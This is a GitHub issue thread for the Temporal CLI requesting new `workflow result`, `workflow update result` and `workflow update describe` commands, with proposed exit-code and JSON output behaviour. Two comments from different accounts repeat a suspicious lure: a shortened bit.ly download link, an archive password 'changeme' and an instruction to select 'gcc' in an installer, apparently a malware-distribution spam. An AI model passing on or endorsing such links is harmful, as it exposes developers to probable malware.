### ISSUE TITLE
[Feature Request] Add `workflow result`, `workflow update result`, and `workflow update describe`

### ISSUE THREAD

**Issue by dandavison** [temporalio/cli#647]
### Is your feature request related to a problem? Please describe.

- In https://github.com/temporalio/cli/issues/597 we are adding `workflow update start`. This will output the updateID.
- **Users need a way to fetch the result (or failure info) given that ID, analogous to what they do in SDKs with update handles.**
- They _could_ do so with `update execute` (advanced users of the platform will know that this latches on to an existing update if it exists)
- However, **what we would like is to create a consistent API for `temporal workflow` and `temporal workflow update`** for fetching result/failure/status info.
- Both `temporal workflow` and `temporal workflow update` (with issue 597) support `start` and `execute` subcommands.
- `temporal workflow` additionally supports `describe` which returns a lot of metadata, including the workflow result.

### Describe the solution you'd like

- We add `temporal workflow update result`.
  - This blocks until the update succeeds or errors/fails.
  - The shell process exit code shall be 0 iff the update succeeded. (But output goes to stdout even when shell exit status non-zero)
  - Under `--output=text` this shall return either a JSON representation of the result or base64-encoded data. (If returning JSON and the result is a string then that string is quoted.)
  - Under `--output=json`, if the update succeeded, this shall return a JSON document containing a key named `result`. TBD on other keys.
  - Under `--output=json`, if the update failed, this shall return a JSON document containing keys describing the error (TBD, but message, error code, details/cause etc). It shall not contain a key named `result`.

- We add `temporal workflow update describe`.
  - This does not block (at least, not by default).
  - Details need designing, but in spirit, the idea is that if the update has completed then this contains the information from `update result` and potentially more. One design question is: with `--output=json`, should the entire `update result` document be included behind a key named `result`? Consistency with `workflow result` will probably be an important consideration.
  - The shell process exit code shall be 0 unless the required gRPC call to the server failed, i.e. regardless of update success.

- We add `temporal workflow result`
  - This blocks until the workflow run has finished (result, fail, terminate, cancel, CAN)
  - The shell process exit code shall be 0 iff the workflow succeeded. (But output goes to stdout even when shell exit status non-zero). (TBD: CAN is non-zero?)
  - The output is analogous to `update result` above: a small JSON document or printed output describing the workflow result/failure.
  - The motivation for adding this is that it will give consistency with `temporal update`, and will give CLI users a way to obtain their workflow result/failure info in a way that is both more natural (the word is "result" as opposed to "describe") and more convenient (when printed out, especially in JSON, the result is not hidden away with so much other metadata).

**Comment by ReversingMe** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
